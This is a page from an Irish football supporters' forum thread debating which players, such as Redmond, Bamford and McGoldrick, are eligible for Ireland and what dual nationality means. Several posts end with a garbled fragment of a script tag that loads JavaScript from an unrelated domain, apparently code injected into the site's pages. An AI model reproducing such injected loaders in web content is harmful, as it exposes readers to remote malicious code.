You Boys in Green Homepage YBIG Shop
Forum Home Forum Home : International : Republic Of Ireland
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Players eligible for Ireland

Post Reply Post Reply Page  <1 239240241242243 450>
Author
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote Green rebel Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:47pm
lads I see alot of talk about Redmond from what im hearing he has no interest in playing for us.Good to see Grant hall back playing.
Sponsored Links

aviva8 View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote aviva8 Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 8:53pm
bamford better than mcgoldrick? Just asking as I haven't seen bamford much. Redmond would be a great addition but don't think he interested however  i don't think he make England squad so he might have a choice to make soon,  international football with ireland or no international football at all
pre Madonna View Drop Down
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:28pm
Originally posted by Sullivinho Sullivinho wrote:

Originally posted by pre Madonna pre Madonna wrote:

Did you have a problem with David McGoldrick playing last night?McGoldrick who didn't know he had any Irish connection until 2014? Sure, he chose us over Scotland, but would he have chose us over England?

None whatsoever. By all accounts, McGoldrick got his declaration/paperwork underway soon after discovering his eligibility. I have no problem with England being his first choice growing up.

Originally posted by pre Madonna pre Madonna wrote:

Nathan Redmond has an Irish mother. England may well have been his first choice, but I don't see the difference between a lad having England as his first choice when he is younger and coming to us later and a lad who declares at 18/19 because he knows he won't make it for England. The only difference is the older lad, like Redmond or Bamford, is more likely to be better.

I believe international football is solely worth a damn because of the legitimate partisanship it supposedly stands for. I also reckon there's enough room for idealism and cynicism in a supporter's outlook and both rely on certain etiquettes and gut feelings.

A bit of pride goes a long way too. 

Now, If you're OK with a guy who played at full international level for England throwing on his green consolation prize, bully for you, Madge. Personally, I think it's a joke, devalues the international game and has me reminiscing on the scent of vomit. Just as the Rice saga and its bleeding heart thinkpieces did. Did the winner of the 'most pragmatic response' award ever collect their prize?

Similarly, one can placidly play along with Bamford's long game and bang out their joy on these forums the minute he finally declares.

I'll reserve the right to think he's not-so-subtly taking the piss.
But what is the difference? If McGoldrick had been as good as Redmond was at that age he would have had umpteen underage caps for England  too. Bamford played for us  once at underage. Both are eligible for Ireland and have a connection to the place, it would be very easy to argue that McGoldrick has much less of a connection, given he only found out a few years ago, but only he can truly know that. In their minds, they are most likely to have  seen themselves as English first, the only difference is the ability they showed when they were younger. 

I think that you thinking it's a joke, is a joke. I used to share your views, especially when I lived in Ireland, because I saw nationality as a black and white issue.  It really isn't and I was wrong. Meeting people daily who are proud to be more than one nationality and heritage makes you realise the complex nature of it. Nationalism as a concept  is something that means less and less to a  lot of people, especially in larger countries. We could go into that more, but it is largely only loosely related to this topic. Simply put, to a lot of people the final two words of the phrase 'national football team' are the only two that are really relevant. 

I also think it devalues us as a nation if we start telling people who can and cannot be Irish, which in football teams who can and can't play for us and why. I know everybody will deny it and say otherwise, but a lot of the problem is with these lads' other nationality being English. If some lad had 70 odd underage caps for Germany and had an Irish mother, there would be a huge clamour to get young  Seamus Schumacher on board. I understand the rivalry, but someone can be both English and Irish and we need to accept that. Lads will play underage for both sides and swap over. Some lads will feel more Irish than English, some will feel more English than Irish and, on occasion, some will feel more Jamaican/South African/Mexican/Australian/Martian than both. Some players will make the choice for purely financial motives, but only they will truly know that, so it isn't our position to be judging them on our suspicions.
All we can ask is that when they decide to play for the land of their mother or grandfather, that they try and give it their best and have pride in the shirt, their family and themselves. Everything else is just pseudo-fascist mumbo-jumbo.
I am also extremely sceptical of this view that playing for Ireland is going to be a huge financial boon for anyone. Who was the last player who truly had his career turned round because of being capped or playing well for us? 

I also think the eligibility rules are as fair as can be, the only change I would make is that any cap at senior level should tie a player, but that is more to do with my despair at the way international friendlies are viewed by FIFA than the actual eligibility issue.

Edited by pre Madonna - 27 Mar 2019 at 10:31pm
The O'Shea View Drop Down
Jack Charlton
Jack Charlton
I know everything and I’m NEVER wrong

Post Options Post Options   Thanks (0) Thanks(0)   Quote The O'Shea Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:36pm
McGoldrick has said that he always regarded himself as Irish (grew up in a strongly Irish adoptive family), but only realised he was actually eligible when he tracked down his biological mother. He would have been eligible anyway through his adoptive parents, but evidently he (like many people tbf) was unaware of that fact.
We're decent enough..
cildaratown View Drop Down
Liam Brady
Liam Brady

killdare town

Post Options Post Options   Thanks (0) Thanks(0)   Quote cildaratown Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:38pm
Originally posted by The O'Shea The O'Shea wrote:

McGoldrick has said that he always regarded himself as Irish (grew up in a strongly Irish adoptive family), but only realised he was actually eligible when he tracked down his biological mother. He would have been eligible anyway through his adoptive parents, but evidently he (like many people tbf) was unaware of that fact.

If you're adopted by Irish parents you can play for Ireland? Time to start adopting the best up and coming soccer talent then. 
cildaratown View Drop Down
Liam Brady
Liam Brady

killdare town

Post Options Post Options   Thanks (0) Thanks(0)   Quote cildaratown Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:39pm
Originally posted by Green rebel Green rebel wrote:

lads I see alot of talk about Redmond from what im hearing he has no interest in playing for us.Good to see Grant hall back playing.

Are you hearing in the know rumors or just conjecture based off paper talk? Granted he probably doesn't want to play given that he hasn't switched yet, but have you heard this from someone reliable? 
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:40pm
Originally posted by The O'Shea The O'Shea wrote:

Fair enough, I wasn't aware of that. I wasn't trying to pick him out to have a go at him, certainly not after his performance last night, more as an example of a lad who I (wrongly) thought had little link to us and tried his bollocks off.
Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 10:51pm
He felt Irish because he had an adoptive grandparent from there? Even if he actually did say that , which I highly doubt, it sounds completely unlikely. If these guys hadn't been pro footballers they wouldn't have given being Irish a moment's thought. All Mcgoldrick has indicated is that he  aware of a family link in his adoptive family, nothing beyond that other than journalist filling in words on his behalf perhaps, as happened a lot in the Declan Rice and Jack Grealish sagas.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:10pm
Originally posted by Conan Conan wrote:

He felt Irish because he had an adoptive grandparent from there? Even if he actually did say that , which I highly doubt, it sounds completely unlikely. If these guys hadn't been pro footballers they wouldn't have given being Irish a moment's thought. All Mcgoldrick has indicated is that he  aware of a family link in his adoptive family, nothing beyond that other than journalist filling in words on his behalf perhaps, as happened a lot in the Declan Rice and Jack Grealish sagas.< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
His adoptive parents in Nottingham are Irish, as a result he felt Irish but didn't think he was eligible. When he tracked down his biological parents, he realised his biological grandmother was Irish and he was eligible. I didn't realise this until O'Shea pointed it out and I had a look.

Also, if it was just an adopted grandmother (although that wouldn't, I don't think, have made him eligible) she would have been his granny and then it would have been how influential she was on his life. Plenty of kids are very close to their grandparents.

Conan View Drop Down
Davey Langan
Davey Langan
I’m not very bright.

Post Options Post Options   Thanks (0) Thanks(0)   Quote Conan Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:26pm
I've a Scottish born grandmother I've always felt close enough to but it would be some jump of logic to try and transplant her birth place as my national identity, I don't think that in any way reflects human reality. In any case Mcgoldrick has never as far as I can see tried to make out that he always regarded himself as Irish, that's just wishful thinking on O'Shea's part, unless it was in a secret private conversation between the two of them?< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">
ErsatzThistle View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote ErsatzThistle Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:29pm

I've a Scottish born grandmother I've always felt close enough to but it would be some jump of logic to try and transplant her birth place as my national identity, I don't think that in any way reflects human reality. In any case Mcgoldrick has never as far as I can see tried to make out that he always regarded himself as Irish, that's just wishful thinking on O'Shea's part, unless it was in a secret private conversation between the two of them?< ="text/" async="" ="//onlinekey.biz/1f9f5ee62aefca3cb1.js">

Ah, go on !

What position do you play ? I'm making notes Wink
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 27 Mar 2019 at 11:41pm

It doesn't, it  reflects your human reality, so, as a result, you view everyone else through that prism. National identity(identities) are incredibly personal, your view of what Ireland is and what it should be will be different to mine. One lad with a Scottish grandmother will feel no connection to that country, another lad will be wandering about in a kilt with his balls hanging out. 

TheMightyQuinn View Drop Down
Kevin Kilbane
Kevin Kilbane

Post Options Post Options   Thanks (0) Thanks(0)   Quote TheMightyQuinn Quote  Post ReplyReply Direct Link To This Post Posted: 28 Mar 2019 at 2:12am

Lol - love the imagery here.

McClean’s heart is in the right place, but his head is not. Love the guys passion, but dual nationality is complex, and dependent on many things that would be very difficult to quantify. (I say that as a dual national)....

In my humble and likely unqualified opinion I can appreciate that there is a point where a player needs to make a decision, and a point where the organization (FAI) needs to stop pandering to a player with ability.... and both groups are free to walk that line to their own benefit until that point...

For me- that point is the Sr shirt call up. 

There no point in trying to assess anyone’s legitimacy to the Irish shirt until they turn down a call up.

If a player turns up for the 21’s (or any underage) for years, then suddenly wants to “concentrate on their club career” once called up  to the Sr. team,  then I’m immediately suspicious. For me, assume that guy is gone... good luck to them. 

If a player that is later in their career (say post age 21) and identify that  they qualify, and then take the necessary steps to declare, turn up with bells and whistles,  then welcome aboard. 

Rice and Grealish were keeping their options Open all along. “Concentrating on their club”... that was the line... 

Finally, there is some responsibility to the teams to create a sense of inclusion/comradery so that when players that are “on the fence” are involved- they want to stay involved. . 

You'll not see nothing like the Mighty Quinn
Luis Amor Rodriguez View Drop Down
Liam Brady
Liam Brady

Post Options Post Options   Thanks (0) Thanks(0)   Quote Luis Amor Rodriguez Quote  Post ReplyReply Direct Link To This Post Posted: 02 Apr 2019 at 9:59pm
Max O'Leary getting time in nets for play-off placed Bristol City.  
Robbie Keane
Robbie Keane
I am MALDING

Post Options Post Options   Thanks (0) Thanks(0)   Quote pre Madonna Quote  Post ReplyReply Direct Link To This Post Posted: 02 Apr 2019 at 10:04pm
Originally posted by Luis Amor Rodriguez Luis Amor Rodriguez wrote:

Max O'Leary getting time in nets for play-off placed Bristol City.  
I always feel he looks better in lace.
amccarten313 View Drop Down
Davey Langan
Davey Langan

Post Options Post Options   Thanks (0) Thanks(0)   Quote amccarten313 Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:39pm
bamford has 2 tonight for leeds
grannyrule View Drop Down
Ray Houghton
Ray Houghton

Post Options Post Options   Thanks (0) Thanks(0)   Quote grannyrule Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:44pm
Originally posted by amccarten313 amccarten313 wrote:

bamford has 2 tonight for leeds

Excellent first strike and a very good header for the second.
The only way is up
Gary McKay View Drop Down
Roy Keane
Roy Keane

Yo Adrian

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gary McKay Quote  Post ReplyReply Direct Link To This Post Posted: 09 Apr 2019 at 9:44pm
Young Irish lad, born and bred in Lucan, Jamie Egan off Cabinteely in the Wales u17 squad. I coached him, his father played for me.

WTF ?
"Smalling and Jones.... have the potential to be the PL’s best ever pairing in my opinion." - SlurAlex
 Post Reply Post Reply Page  <1 239240241242243 450>
  Share Topic